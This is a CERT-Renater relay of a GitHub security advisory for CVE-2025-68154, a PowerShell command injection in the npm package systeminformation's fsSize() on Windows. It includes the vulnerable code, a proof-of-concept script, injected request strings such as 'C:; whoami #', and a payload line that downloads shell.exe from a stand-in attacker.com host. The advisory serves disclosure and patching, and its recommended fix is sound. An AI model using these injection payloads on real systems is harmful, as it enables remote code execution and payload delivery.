Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN887
_____________________________________________________________________

DATE                : 19/12/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running systeminformation (npm) versions
                                  prior to 5.27.14.

=====================================================================
https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch
_____________________________________________________________________


Command Injection in fsSize() on Windows
High
sebhildebrandt published GHSA-wphj-fx3q-84ch Dec 16, 2025

Package
systeminformation (npm)

Affected versions
<=5.27.13

Patched versions
5.27.14


Description

Summary

The fsSize() function in systeminformation is vulnerable to OS Command
Injection (CWE-78) on Windows systems. The optional drive parameter is
directly concatenated into a PowerShell command without sanitization,
allowing arbitrary command execution when user-controlled input
reaches this function.

Affected Platforms: Windows only

CVSS Breakdown:

    Attack Vector (AV:N): Network - if used in a web application/API
    Attack Complexity (AC:H): High - requires application to pass user
input to fsSize()
    Privileges Required (PR:N): None - no authentication required at
library level
    User Interaction (UI:N): None
    Scope (S:U): Unchanged - executes within Node.js process context
    Confidentiality/Integrity/Availability (C:H/I:H/A:H): High impact
if exploited

    Note: The actual exploitability depends on how applications use
this function. If an application does not pass user-controlled input
to fsSize(), it is not vulnerable.


Details

Vulnerable Code Location

File: lib/filesystem.js, Line 197

if (_windows) {
  try {
    const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
    util.powerShell(cmd).then((stdout, error) => {

The drive parameter is concatenated directly into the PowerShell
command string without any sanitization.


Why This Is a Vulnerability

This is inconsistent with the security pattern used elsewhere in
the codebase. Other functions properly sanitize user input using
util.sanitizeShellString():

File 	Line 	Function 	Sanitization
lib/processes.js 	141 	services() 	✅ util.sanitizeShellString(srv)
lib/processes.js 	1006 	processLoad() 	✅ util.sanitizeShellString(proc)
lib/network.js 	1253 	networkStats() 	✅ util.sanitizeShellString(iface)
lib/docker.js 	472 	dockerContainerStats() 	✅ util.sanitizeShellString(containerIDs, true)
lib/filesystem.js 	197 	fsSize() 	❌ No sanitization

The sanitizeShellString() function (defined at lib/util.js:731)
removes dangerous characters like ;, &, |, $, `, #, etc., which
would prevent command injection.


PoC

Attack Scenario

An application exposes disk information via an API and passes
user input to si.fsSize():

// Vulnerable application example
const si = require('systeminformation');
const http = require('http');
const url = require('url');

http.createServer(async (req, res) => {
  const parsedUrl = url.parse(req.url, true);
  const drive = parsedUrl.query.drive; // User-controlled input
  
  // VULNERABLE: User input passed directly to fsSize()
  const diskInfo = await si.fsSize(drive);
  
  res.end(JSON.stringify(diskInfo));
}).listen(3000);


Exploitation

Normal Request:

GET /api/disk?drive=C:

Malicious Request (Command Injection):

GET /api/disk?drive=C:;%20whoami%20%23

Command Construction Demonstration

The following demonstrates how commands are constructed with
malicious input:


Normal usage:

Input: "C:"
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

With injection payload C:; whoami #:

Input: "C:; whoami #"
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl
                                                                                                                            ↑         ↑
                                                                                                            semicolon terminates    # comments out rest
                                                                                                            first command

PowerShell will execute:

    Get-WmiObject Win32_logicaldisk | ... | where -property Caption -eq C: (original command)
    whoami (injected command)
    Everything after # is commented out


PoC Script

/**
 * Command Injection PoC - systeminformation fsSize()
 * 
 * Run with: node poc.js
 * Requires: npm install systeminformation
 */

const os = require('os');

// Simulates the vulnerable command construction from filesystem.js:197
function simulateVulnerableCommand(drive) {
  const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
  return cmd;
}

// Test payloads
const payloads = [
  { name: 'Normal', input: 'C:' },
  { name: 'Command Execution', input: 'C:; whoami #' },
  { name: 'Data Exfiltration', input: 'C:; Get-Process | Out-File C:\\temp\\procs.txt #' },
  { name: 'Remote Payload', input: 'C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\temp\\shell.exe #' },
];

console.log('=== Command Injection PoC ===\n');
console.log(`Platform: ${os.platform()}`);
console.log(`Note: Actual exploitation requires Windows\n`);

payloads.forEach(p => {
  console.log(`[${p.name}]`);
  console.log(`  Input: ${p.input}`);
  console.log(`  Command: ${simulateVulnerableCommand(p.input)}\n`);
});


PoC Output

=== Command Injection PoC ===

Platform: win32
Note: Actual exploitation requires Windows

[Normal]
  Input: C:
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

[Command Execution]
  Input: C:; whoami #
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl

[Data Exfiltration]
  Input: C:; Get-Process | Out-File C:\temp\procs.txt #
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Get-Process | Out-File C:\temp\procs.txt # | fl

[Remote Payload]
  Input: C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe #
  Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe # | fl


As shown, the attacker's commands are injected directly into the
PowerShell command string.


Impact

Who Is Affected?

    Applications running systeminformation on Windows that pass
user-controlled input to fsSize(drive)
    Web applications, APIs, or CLI tools that accept drive
letters from users
    Monitoring dashboards that allow users to specify which
drives to query

Potential Attack Scenarios

    Remote Code Execution (RCE) - Execute arbitrary commands with
Node.js process privileges
    Data Exfiltration - Read sensitive files and exfiltrate data
    Privilege Escalation - If Node.js runs with elevated privileges
    Lateral Movement - Use the compromised system to attack internal network
    Ransomware Deployment - Download and execute malicious payloads


Recommended Fix

Apply util.sanitizeShellString() to the drive parameter, consistent
with other functions in the codebase:

  if (_windows) {
    try {
+     const driveSanitized = drive ? util.sanitizeShellString(drive, true) : '';
-     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
+     const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${driveSanitized ? '| where -property Caption -eq ' + driveSanitized : ''} | fl`;
      util.powerShell(cmd).then((stdout, error) => {

The true parameter enables strict mode which removes additional
characters like spaces and parentheses.


References

    CWE-78: Improper Neutralization of Special Elements used in
an OS Command ('OS Command Injection')
    OWASP Command Injection
    Node.js Security Best Practices
    systeminformation npm package

Thank you for your work on systeminformation. I hope this report
helps improve the security of the project. Please let me know if
you need any additional information or clarification.


Severity
High
8.1/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2025-68154

Weaknesses
Weakness CWE-78


Credits

    @yueyueL yueyueL Reporter




=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================